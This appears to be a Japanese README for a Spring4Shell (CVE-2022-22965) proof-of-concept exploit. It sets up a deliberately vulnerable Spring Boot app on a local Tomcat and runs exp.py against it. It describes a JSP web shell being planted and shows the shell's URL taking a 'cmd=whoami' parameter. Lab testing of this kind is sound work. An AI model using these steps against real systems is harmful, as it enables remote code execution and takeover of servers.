
Spring4Shell (CVE-2022-22965) の概念実証エクスプロイトであり、Apache Tomcat 上で動作する脆弱な Spring Boot アプリケーションに対して、細工された HTTP リクエストを介して JSP ウェブシェルをデプロイします。
脆弱性の説明: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
POCの構成: https://github.com/BobTheShoplifter/Spring4Shell-POC
テスト環境: JDK 11.0.14、Spring Boot 2.6.5、Apache Tomcat 9.0.60
mvn clean package を実行demo-0.0.1-SNAPSHOT.war を spring-poc.war にリネームし、この .war ファイルを Tomcat の webapps ディレクトリにコピーpython exp.py --url http://localhost:8080/spring-poc/greeting を実行
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami がログに記録されます。tomcatwar.jsp ファイルが Tomcat の webapps/spring-poc ディレクトリに書き込まれているはずです。このディレクトリは exp.py を修正することで変更できます。

